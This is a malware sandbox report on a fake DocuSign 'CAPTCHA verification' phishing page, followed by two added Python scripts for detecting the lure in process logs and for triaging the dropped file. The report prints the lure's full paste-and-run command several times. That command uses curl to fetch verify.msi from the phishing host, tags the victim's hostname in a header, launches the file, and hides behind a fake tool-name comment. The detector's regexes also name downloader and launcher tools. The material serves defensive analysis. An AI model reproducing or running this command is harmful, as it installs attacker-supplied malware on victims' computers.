Windows Analysis Report
https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF
Overview
General Information
Detection
Score: | 64 (range 0 - 100) |
Confidence: | 100% |
- System is w10x64
- chrome.exe (PID: 1540, MD5: E81F54E6C1129887AEA47E7D092680BF) cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
- chrome.exe (PID: 4564, MD5: E81F54E6C1129887AEA47E7D092680BF) cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1768,i,13563723301119555575,7756311842140240896,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2148 /prefetch:3
- chrome.exe (PID: 6392, MD5: E81F54E6C1129887AEA47E7D092680BF) cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF"
- cmd.exe (PID: 4328, MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) cmdline: cmd /K cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: %computername%" -o %userprofile%\verify.msi && start %userprofile%\verify.msi && echo CAPTCHA Code: 033561 && pause && rem DocuSign CAPTCHA Verification Tool (ver. 2025.1022)
- conhost.exe (PID: 6964, MD5: 0D698AF330FD17BEE3BF90011D49251D) cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- cmd.exe (PID: 6912, MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) cmdline: cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: user-PC" -o C:\Users\user\verify.msi
- curl.exe (PID: 6452, MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) cmdline: curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: user-PC" -o C:\Users\user\verify.msi
- cleanup

Signature categories:
- Phishing
- Networking
- System Summary
- Persistence and Installation Behavior
- Malware Analysis System Evasion
- HIPS / PFW / Operating System Protection Evasion
Phishing |
---|
Joe Sandbox AI: 3 findings |
HTTP Parser: 11 findings |
HTTP traffic detected: 4 findings |
DNS traffic detected: 6 findings |
String found in binary or memory: 19 findings |
File created: 2 findings |
File deleted: 1 finding |
Classification label: 1 finding |
Mutant created: 1 finding |
Key opened: 1 finding |
Process created: 29 findings |
Section loaded: 13 findings |
Window detected: 1 finding |
Persistence and Installation Behavior |
---|
OCR Text: 1 finding |
Clipboard modification: 1 finding |
Last function: 2 findings |
Binary or memory string: 1 finding |
Process created: 3 findings |
The per-finding evidence text, and the headers of the Networking, System Summary and evasion categories, are not present in this copy of the report; rows are listed in report order under the two headers that survived.
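The recorded chain (cmd /K cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: %computername%" -o %userprofile%\verify.msi && start %userprofile%\verify.msi && echo CAPTCHA Code: 033561 && pause && rem DocuSign CAPTCHA Verification Tool (ver. 2025.1022)), together with the clipboard modification and OCR text findings above, is the shape of a paste-and-run lure: the page places a command on the clipboard, the visitor pastes it into a Run box or console, curl fetches an MSI while tagging the victim host in a custom header, and the trailing rem comment makes the pasted line read like a harmless tool name. The Python below is an added example, not part of the Joe Sandbox report, that scores process-creation command lines for that pattern and pulls the URL and custom header out as indicators. The sample events, parent images and score weights are constructed for illustration; only event 0's command line is taken from the report.

```python
import re
from dataclasses import dataclass, field

# Constructed process-creation events. Event 0 reproduces the command line
# from the report above; events 1 and 2 are benign decoys. Parent images are
# assumed (the report does not show them).
SAMPLE_EVENTS = [
    {
        "image": r"C:\Windows\SysWOW64\cmd.exe",
        "parent": r"C:\Windows\explorer.exe",
        "cmdline": (
            'cmd /K cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify '
            '-H "x-system-id: %computername%" -o %userprofile%\\verify.msi '
            '&& start %userprofile%\\verify.msi && echo CAPTCHA Code: 033561 '
            '&& pause && rem DocuSign CAPTCHA Verification Tool (ver. 2025.1022)'
        ),
    },
    {
        "image": r"C:\Windows\System32\cmd.exe",
        "parent": r"C:\Program Files\Jenkins\jenkins.exe",
        "cmdline": 'cmd.exe /c curl.exe -s https://example.invalid/api/health -o %TEMP%\\health.json',
    },
    {
        "image": r"C:\Windows\System32\cmd.exe",
        "parent": r"C:\Windows\System32\cmd.exe",
        "cmdline": "cmd.exe /c echo CAPTCHA Code: 1234 && pause",
    },
]

DOWNLOADER = re.compile(r"\b(curl|certutil|bitsadmin|mshta|powershell|iwr|invoke-webrequest)\b", re.I)
USER_WRITABLE = re.compile(r"%(userprofile|temp|tmp|appdata|localappdata|public)%|\\Users\\|\\ProgramData\\", re.I)
LAUNCHER = re.compile(r"\b(start|msiexec|rundll32|regsvr32|wscript|cscript)\b", re.I)
LURE = re.compile(r"\b(captcha|verif(y|ication)|not a robot|ray id)\b", re.I)
TRAILING_REM = re.compile(r"&&\s*rem\b[^&]*$", re.I)   # comment that disguises the pasted line
HEADER = re.compile(r'-H\s+"([^":]+):\s*([^"]*)"')     # curl custom header, e.g. x-system-id
URL = re.compile(r"https?://[^\s\"'&]+")

ALERT_THRESHOLD = 6   # assumed weight; tune against your own telemetry


@dataclass
class Verdict:
    score: int = 0
    reasons: list = field(default_factory=list)
    iocs: dict = field(default_factory=dict)

    @property
    def alert(self) -> bool:
        return self.score >= ALERT_THRESHOLD


def assess(event: dict) -> Verdict:
    """Score one process-creation event for the paste-and-run download chain."""
    cmd = event["cmdline"]
    v = Verdict()
    downloads = bool(DOWNLOADER.search(cmd))
    if downloads and USER_WRITABLE.search(cmd):
        v.score += 3
        v.reasons.append("download tool writing into a user-writable path")
    if downloads and LAUNCHER.search(cmd):
        v.score += 3
        v.reasons.append("download chained with a launcher in one command line")
    if LURE.search(cmd):
        v.score += 2
        v.reasons.append("CAPTCHA/verification lure text")
    if TRAILING_REM.search(cmd):
        v.score += 2
        v.reasons.append("trailing rem comment used to disguise the pasted line")
    if re.match(r"\s*cmd(\.exe)?\s+/k\b", cmd, re.I):
        v.score += 1
        v.reasons.append("cmd /K keeps the window open to show the fake code")
    if event.get("parent", "").lower().endswith("\\explorer.exe"):
        v.score += 1
        v.reasons.append("spawned from explorer.exe (Win+R paste)")
    # Indicators worth extracting regardless of score.
    v.iocs["urls"] = URL.findall(cmd)
    v.iocs["headers"] = {k.strip().lower(): val.strip() for k, val in HEADER.findall(cmd)}
    return v


def scan(events):
    """Return (index, Verdict) for every event that crosses the alert threshold."""
    hits = []
    for i, e in enumerate(events):
        v = assess(e)
        if v.alert:
            hits.append((i, v))
    return hits


if __name__ == "__main__":
    for i, v in scan(SAMPLE_EVENTS):
        print(f"event {i}: score={v.score} reasons={v.reasons} iocs={v.iocs}")
```

Only event 0 crosses the threshold; the benign curl download and the lone "CAPTCHA" echo each score below it. The extracted x-system-id header value is useful beyond this one sample: the server side of such a lure typically keys the payload on that header, so a web proxy rule that flags curl user agents sending a hostname-valued custom header to a newly seen domain catches the fetch even when the command line is not logged.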
Tactic | Techniques flagged (count prefix as printed in the report) |
---|---|
Execution | 1 Command and Scripting Interpreter |
Persistence | 3 Browser Extensions; 1 DLL Side-Loading |
Privilege Escalation | 11 Process Injection; 1 DLL Side-Loading |
Defense Evasion | 11 Masquerading; 11 Process Injection; 1 DLL Side-Loading; 1 File Deletion |
Discovery | 1 Security Software Discovery; 1 System Information Discovery |
Command and Control | 2 Non-Application Layer Protocol; 2 Application Layer Protocol; 1 Ingress Tool Transfer |
Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Collection, Exfiltration, Impact | no techniques flagged |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 0% | Avira URL Cloud | safe | |
| 0% | Avira URL Cloud | safe | |
| 0% | Avira URL Cloud | safe | |
| 0% | Avira URL Cloud | safe | |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
jsdelivr.map.fastly.net | 151.101.193.229 | true | false | high | |
google.com | 142.251.40.238 | true | false | high | |
play.google.com | 172.217.165.142 | true | false | high | |
www.google.com | 142.251.40.196 | true | false | high | |
upload.wikimedia.org | 208.80.154.240 | true | false | high | |
account.esign.us.com | 44.203.127.19 | true | true | unknown | |
cdn.jsdelivr.net | unknown | unknown | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
| false | | high |
| true | | unknown |
| false | | high |
| false | | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
| | false | | high |
| | false | | unknown |
| | false | | high |
| | true | | unknown |
| | false | | unknown |
| | false | | high |
IP | Domain | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
151.101.193.229 | jsdelivr.map.fastly.net | United States | 54113 | FASTLY (US) | false |
208.80.154.240 | upload.wikimedia.org | United States | 14907 | WIKIMEDIA (US) | false |
44.203.127.19 | account.esign.us.com | United States | 14618 | AMAZON-AES (US) | true |
142.251.40.142 | unknown | United States | 15169 | GOOGLE (US) | false |
142.251.40.196 | www.google.com | United States | 15169 | GOOGLE (US) | false |
172.217.165.142 | play.google.com | United States | 15169 | GOOGLE (US) | false |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1645433 |
Start date and time: | 2025-03-21 18:43:21 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 3m 22s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | browseurl.jbs |
Sample URL: | https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 20 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal64.phis.win@29/27@18/7 |
- Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe, TextInputHost.exe
- Excluded IPs from analysis (whitelisted): 142.251.40.131, 142.251.32.110, 142.250.80.110, 172.253.122.84, 142.250.80.78, 142.250.176.206, 142.251.40.106, 142.250.65.195, 17.253.97.202, 17.253.97.204, 142.250.72.99, 142.250.176.195, 17.253.3.139, 17.253.3.134, 199.232.214.172, 142.251.40.238, 142.250.80.42, 142.251.40.138, 172.217.165.138, 142.250.65.170, 142.251.40.234, 142.250.80.106, 142.251.40.202, 142.250.80.74, 142.250.64.106, 142.250.80.10, 142.251.40.170, 142.250.64.74, 142.250.176.202, 142.250.72.106, 142.251.41.10, 142.251.35.174, 142.250.65.238, 142.251.40.206, 199.232.210.172, 142.251.40.195, 142.250.65.163, 184.31.69.3, 192.168.2.6, 20.109.210.53
- Excluded domains from analysis (whitelisted): fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, developer.apple.com, fe3cr.delivery.mp.microsoft.com, developer-cdn.apple.com.akadns.net, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, www.gstatic.com, world-gen.g.aaplimg.com
- Not all processes were analyzed, report is missing behavior information
- Report size getting too big, too many NtOpenFile calls found.
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
- VT rate limit hit for: https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF
Time | Type | Description |
---|---|---|
18:44:42 | Clipboard |
Process: | C:\Windows\SysWOW64\curl.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10055680 |
Entropy (8bit): | 7.99703770777142 |
Encrypted: | true |
SSDEEP: | 196608:1wCYGozqoC3sktVQC6WGwW3YziyfzrvHWrHMJ/ZnznFE5xlNhsVm:1UDAvtCC6FlByfXvHWEZnzqZ |
MD5: | F35E55AB0B13D00D1237F09D2BC603DD |
SHA1: | D31368479E8E632DA929F2E385B6A31FFFA5B507 |
SHA-256: | 4DF441E0A284601615217184DC64FCF9427E659F534FFA6228BBBA152CEA4274 |
SHA-512: | 566B3C3733D396AC572A48A28059CC4FAF6169CBDEF82CA67A6A736C622D3C7988C395610D9CB4B087EB87978250ABA3707F1A0B32C258234E05591B715CA282 |
Malicious: | false |
Reputation: | low |
Preview: |
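The entry above is the verify.msi written by curl.exe: 10,055,680 bytes, 8-bit entropy 7.997, flagged Encrypted: true, reputation low, Malicious: false. The last field is not an all-clear. The analysis stopped on timeout, curl.exe is listed as not having exited, and no msiexec process appears among the processes shown, so the package was never observed running. The Python below is an added example, not part of the report, showing how the size, entropy and encrypted fields are derived and adding the one static check to do first on anything named .msi: confirming it carries the OLE Compound File header that every Windows Installer package starts with. The sample byte strings are constructed (the real verify.msi is not on the page) and the 7.9 entropy threshold is an assumption chosen only to agree with the report's own rows (7.99 marked true, 7.83 marked false).

```python
import math
import random
from collections import Counter

# OLE2 Compound File Binary signature; genuine Windows Installer packages
# (.msi) begin with these eight bytes.
CFB_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")

# Assumed cut-off for the report's "Encrypted" flag; Joe Sandbox's real
# threshold is not stated on the page.
ENCRYPTED_THRESHOLD = 7.9


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for constant data, 8.0 for uniform."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def is_cfb(data: bytes) -> bool:
    """True if the blob starts with the Compound File header an MSI must have."""
    return data[:8] == CFB_MAGIC


def triage(name: str, data: bytes, threshold: float = ENCRYPTED_THRESHOLD) -> dict:
    """Reproduce the report's size / entropy / encrypted fields and add a type check."""
    ent = shannon_entropy(data)
    cfb = is_cfb(data)
    notes = []
    if name.lower().endswith(".msi") and not cfb:
        notes.append("extension says MSI but no CFB header: not a Windows Installer package")
    if ent >= threshold:
        notes.append("high entropy: compressed or encrypted content, detonate before trusting a 'not malicious' verdict")
    return {
        "name": name,
        "size": len(data),
        "entropy": round(ent, 3),
        "encrypted": ent >= threshold,
        "is_cfb": cfb,
        "notes": notes,
    }


# Constructed samples, seeded so the numbers are reproducible.
_rng = random.Random(20250321)
SAMPLES = {
    "sparse.msi": CFB_MAGIC + bytes(65536 - 8),            # valid header, mostly zeros
    "packed.msi": CFB_MAGIC + _rng.randbytes(65536 - 8),   # valid header, random body
    "notmsi.msi": b"MZ" + _rng.randbytes(65536 - 2),       # PE-looking blob with an .msi name
}


def triage_all() -> dict:
    return {name: triage(name, data) for name, data in SAMPLES.items()}


if __name__ == "__main__":
    for result in triage_all().values():
        print(result)
```

A 64 KiB random body lands at about 7.997 bits per byte, the same figure the report gives for the 10 MB verify.msi, which is what a CAB-compressed or encrypted installer payload looks like; a plain MSI whose streams are mostly text and padding sits far lower. The header check separates "a real installer that needs detonating" from "something else wearing an .msi name", which changes what tooling you reach for next.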
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 24368 |
Entropy (8bit): | 7.990776494170634 |
Encrypted: | true |
SSDEEP: | 384:dg3hlifU7dYMasNHvcIxoRqrYcyKRjpt2PJKYytsPLFOYYmHRlkaSsD:YqsdxxhcIxo8rPyKJpt6nyaPwtOR2aVD |
MD5: | 42B95430773B4A1DEDFCFDA8C03A1D4B |
SHA1: | 8581FACE3A3703B4807AA2440E5354EA55A6C4EE |
SHA-256: | B0E7558F4710A1E255B93E3DEEFE3AEBB19F3BB41C150F685A74D3B1A1C79E87 |
SHA-512: | 590E1E4DCA67CB9088844530EFF20725270421A6C521FC05CF09948DF81AB6DBB0A169F42B58B031AD888F0E7ED863A0221B9243BF2B502E805B82DDCCEE9573 |
Malicious: | false |
Reputation: | low |
URL: | https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuI6fAZ9hiA.woff2 |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 569 |
Entropy (8bit): | 4.9023364401407115 |
Encrypted: | false |
SSDEEP: | 12:Uc11FP/sO6ZRoT6pHAcigkSAx/s6ZmOHc9n+5cMK00k14enEPCedG:3F8OYsKugXYmOOk4TfenEPCD |
MD5: | D90D7948B5841876B51C2D3D1FA7DF26 |
SHA1: | EA1B1FCEF5C8D9C1AEB5A27FB69B195CBC3F0A69 |
SHA-256: | CC0BC2CBACA383E1600D349E580513F188E4D745BF269B63FFAFF46A091FD196 |
SHA-512: | A2A131E36F8E0BE7015BF22C6FA6F5EA2FCF817EB5E11287CE3BA6274674F2AF3873B0265C8959BA915C05E2BEA4E4F7CF4590135213208CAB84130C6C607A9C |
Malicious: | false |
Reputation: | low |
URL: | https://fonts.googleapis.com/icon?family=Material+Icons |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 2591 |
Entropy (8bit): | 5.551944904436444 |
Encrypted: | false |
SSDEEP: | 48:ejOXaVujOXak8FZjjOXamjOXakj43rjOXadNjOXaUJc+uXjOXaYN0xD:aOXaVqOXak8FZHOXaiOXah3vOXa7OXan |
MD5: | 955A06E42819BE6A6D372B7C77E38E15 |
SHA1: | 843A09FE443606A6C6E0476C85F56E38F6979715 |
SHA-256: | A221060E887590FCA4A80048400D6FC61883803F27CF2266920C0B8A16C03D6C |
SHA-512: | 35F9A2383A890C955D24C609BCBDDD11F76574C08DF018FA2DE246C21889EEEA7D918E72ED7E4958F3D862F0196A89D1AA2096B45965B434F89D9A12EEB79165 |
Malicious: | false |
Reputation: | low |
URL: | https://fonts.googleapis.com/css2?family=Inter:wght@500&display=swap |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10804 |
Entropy (8bit): | 4.481624126994836 |
Encrypted: | false |
SSDEEP: | 192:v6+WE7QxvAjShzwzb7M1/myAYUNNdZnvGuQTF4U:v6+Pkxv44q/EH10U |
MD5: | 2928664FE1FC6ACA88583A6F606D60BA |
SHA1: | 2F2FE1CBD0563B3CE3EA79FCDF1549ED244B3993 |
SHA-256: | A26FC5B38380272C92E9019A2EB8B45542A66814B3E2B203772DB8904B9FB99F |
SHA-512: | 7D6F8B7E54A4DA3CF81C767B4AA40C3B04BAFE35F2DD77B85944DE4442F0B1DD1A8EDA0175DEB4652CF055094ACDC0D4B6E38ABE51C52A3DFBF887481315B347 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 10804 |
Entropy (8bit): | 4.481624126994836 |
Encrypted: | false |
SSDEEP: | 192:v6+WE7QxvAjShzwzb7M1/myAYUNNdZnvGuQTF4U:v6+Pkxv44q/EH10U |
MD5: | 2928664FE1FC6ACA88583A6F606D60BA |
SHA1: | 2F2FE1CBD0563B3CE3EA79FCDF1549ED244B3993 |
SHA-256: | A26FC5B38380272C92E9019A2EB8B45542A66814B3E2B203772DB8904B9FB99F |
SHA-512: | 7D6F8B7E54A4DA3CF81C767B4AA40C3B04BAFE35F2DD77B85944DE4442F0B1DD1A8EDA0175DEB4652CF055094ACDC0D4B6E38ABE51C52A3DFBF887481315B347 |
Malicious: | false |
Reputation: | low |
URL: | https://developer.apple.com/assets/elements/badges/download-on-the-app-store.svg |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 2228 |
Entropy (8bit): | 7.82817506159911 |
Encrypted: | false |
SSDEEP: | 48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D |
MD5: | EF9941290C50CD3866E2BA6B793F010D |
SHA1: | 4736508C795667DCEA21F8D864233031223B7832 |
SHA-256: | 1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A |
SHA-512: | A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9 |
Malicious: | false |
Reputation: | low |
URL: | https://www.gstatic.com/recaptcha/api2/logo_48.png |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 287196 |
Entropy (8bit): | 6.0648318979601905 |
Encrypted: | false |
SSDEEP: | 6144:7v0J0Yd5lHI38+QPbll7ga3ZYThRK5+VcJ/dg7qp:7vkvn9ISzll7FKhRjkf |
MD5: | C6E864E56E1CF59CC4CC22FAAD40F116 |
SHA1: | 6FC3B18767E861A496157D6EDFF783EAC2C44516 |
SHA-256: | CA9B4FE3468E648B04F9FC8957285A1205C76E8883EE2D2950CBE4235E896B27 |
SHA-512: | 5FFA6237B623773473398727CCE9FFAD83488127A61DB84D5F2596A52E3643C78768CFDF9706BF25F9118A91DECA5711ACB7DCE5AE5C03176D683A305C1580E8 |
Malicious: | false |
Reputation: | low |
URL: | https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 52 |
Entropy (8bit): | 4.5395834108987785 |
Encrypted: | false |
SSDEEP: | 3:OdCd/ZoSb9inuSISHmn:OdCd/ZoSb99Sfmn |
MD5: | E5ABEC1C9A505AC76B6AA29071ED1082 |
SHA1: | 9B3D310EAC34E7C05270AD5E902A077019B7D317 |
SHA-256: | 5F1331C24E99130BEBFCAC9910702F8D560DD09A639E3C29901402FE19A64D0E |
SHA-512: | D1C91772CB0DBA86C4D264963694BD05ED3B4E16C70A3EC66508F35F7257D4932A5D917B6CEA40FB8F1A5084510FC1CE314DD604991FCEDCA1BDEA4B831A0B33 |
Malicious: | false |
Reputation: | low |
URL: | https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIuCYHyZX_ZHdoAEgUNoV9LmxIFDZFhlU4SBQ2UkJL6EgUNBu27_yHmEUAwvElXuA==?alt=proto |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 20713 |
Entropy (8bit): | 5.053868437066879 |
Encrypted: | false |
SSDEEP: | 192:CBh5Cif2IgOmgOua1YldXaugk7OyC7AL2DSYy3epAd/3nsTeUxX:CB72InJaq+ROOyC7AN3Mu/XsTeUxX |
MD5: | 53EF696D417D353EFBD07C105F694756 |
SHA1: | F37FBCF88F577F3152B8EC113D83B843DC6E2BC8 |
SHA-256: | B166631D0898F5FBE179400EA31AECCF0F56A61977CEA7D56B3D6464A12FA2DF |
SHA-512: | 36FB911A53DFE9C1E9C50A811A73DEEDF3E8002A72AE386548D79755463B059023D67361B8DA5106ADE8B02E32AF6BECC1412E1EAD87B42B18DAF7CB3429DD60 |
Malicious: | false |
Reputation: | low |
URL: | https://cdn.jsdelivr.net/npm/sweetalert2@11.6.15/dist/sweetalert2.min.css |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2228 |
Entropy (8bit): | 7.82817506159911 |
Encrypted: | false |
SSDEEP: | 48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D |
MD5: | EF9941290C50CD3866E2BA6B793F010D |
SHA1: | 4736508C795667DCEA21F8D864233031223B7832 |
SHA-256: | 1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A |
SHA-512: | A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 462 |
Entropy (8bit): | 6.832834205355095 |
Encrypted: | false |
SSDEEP: | 12:6v/7ECUPfn6mCx9OOsTNmNLw8h6/KzSkCt1RKEM0Ht1B:xPiA1Z8h6yzRqWEMEr |
MD5: | 3116E1AF6C57317209879BED595ACE28 |
SHA1: | DB24192BD54896DA5994A8507942FA80A4427185 |
SHA-256: | 894EFF46E7DE96D535594F704E544C8B95F0956285AE535FCB9985D5C9996544 |
SHA-512: | 68108788CFE930A64BF38D19BA02FBFE271E37AD0FD21EC7939DC10BA10BBD3AA9029627506A140E55012A46C8931BDEF94C7FEB93F513F2B4A65F61C5A33AF8 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4904 |
Entropy (8bit): | 7.899029446643728 |
Encrypted: | false |
SSDEEP: | 96:OdBnjzG7DZTxqIfy33nn/qf46vhPQuAgul5SZBsj51v1f:OdBnjwDZTx5fy33no4ShRjuX2sd1vt |
MD5: | 1E91D02CF5A902F38F2923C006D79281 |
SHA1: | CB8126B32C2274E0394246B40BD0B7F9F847E44C |
SHA-256: | F72611E2DF8E88204009FD896D05D5E8E83C77009C63943BBFFA169559934849 |
SHA-512: | 54B69544DC55ADDC0B2DDC08418D1A0A34240697070FE47FEAE9E915C70D33EF662CE1B7154CBCAD84019D22F3291F138CC7298224D381CC740C2097478D4042 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 4904 |
Entropy (8bit): | 7.899029446643728 |
Encrypted: | false |
SSDEEP: | 96:OdBnjzG7DZTxqIfy33nn/qf46vhPQuAgul5SZBsj51v1f:OdBnjwDZTx5fy33no4ShRjuX2sd1vt |
MD5: | 1E91D02CF5A902F38F2923C006D79281 |
SHA1: | CB8126B32C2274E0394246B40BD0B7F9F847E44C |
SHA-256: | F72611E2DF8E88204009FD896D05D5E8E83C77009C63943BBFFA169559934849 |
SHA-512: | 54B69544DC55ADDC0B2DDC08418D1A0A34240697070FE47FEAE9E915C70D33EF662CE1B7154CBCAD84019D22F3291F138CC7298224D381CC740C2097478D4042 |
Malicious: | false |
Reputation: | low |
URL: | https://play.google.com/intl/en_us/badges/static/images/badges/en_badge_web_generic.png |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 462 |
Entropy (8bit): | 6.832834205355095 |
Encrypted: | false |
SSDEEP: | 12:6v/7ECUPfn6mCx9OOsTNmNLw8h6/KzSkCt1RKEM0Ht1B:xPiA1Z8h6yzRqWEMEr |
MD5: | 3116E1AF6C57317209879BED595ACE28 |
SHA1: | DB24192BD54896DA5994A8507942FA80A4427185 |
SHA-256: | 894EFF46E7DE96D535594F704E544C8B95F0956285AE535FCB9985D5C9996544 |
SHA-512: | 68108788CFE930A64BF38D19BA02FBFE271E37AD0FD21EC7939DC10BA10BBD3AA9029627506A140E55012A46C8931BDEF94C7FEB93F513F2B4A65F61C5A33AF8 |
Malicious: | false |
Reputation: | low |
URL: | https://upload.wikimedia.org/wikipedia/commons/thumb/2/2b/Windows_logo_2012-Black.svg/25px-Windows_logo_2012-Black.svg.png |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 43365 |
Entropy (8bit): | 5.248811076277145 |
Encrypted: | false |
SSDEEP: | 768:WPbVoLscD1xXIIe6oOlCczwCF9av8Bm58uD7hWuUewNlaAU1GV1pUrxvXELQe2S7:QomIjigMb7h4lKiOGaLxm1m9Bk |
MD5: | 3042F5F45C2338989497F11F1E4813D8 |
SHA1: | 6D018A5F343991F4CBFDC5BA18B429787D1BF1C5 |
SHA-256: | EF23C3CAE3EDA672437471D564F354F2C93E9BBA47D4F789DB501C48DA758F3B |
SHA-512: | 6784183527360C5BFC2EB84C1326AB10FDEB0643830594FDD11C140BB758418176F55E1D7E487EF286191EDD11E93DFF28DBF7DBFBB45BA89C19651493D5748C |
Malicious: | false |
Reputation: | low |
URL: | https://cdn.jsdelivr.net/npm/sweetalert2@11.6.15/dist/sweetalert2.min.js |
Preview: |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type (65 = HTTPS record, RFC 9460) | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Mar 21, 2025 18:44:27.924280882 CET | 192.168.2.6 | 1.1.1.1 | 0x6834 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 21, 2025 18:44:27.924544096 CET | 192.168.2.6 | 1.1.1.1 | 0x8e77 | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 21, 2025 18:44:29.010727882 CET | 192.168.2.6 | 1.1.1.1 | 0x65ff | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 21, 2025 18:44:29.013665915 CET | 192.168.2.6 | 1.1.1.1 | 0x8caa | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 21, 2025 18:44:29.701042891 CET | 192.168.2.6 | 1.1.1.1 | 0xaf74 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 21, 2025 18:44:29.701426029 CET | 192.168.2.6 | 1.1.1.1 | 0x6ac9 | Standard query (0) | 65 | IN (0x0001) | false | |
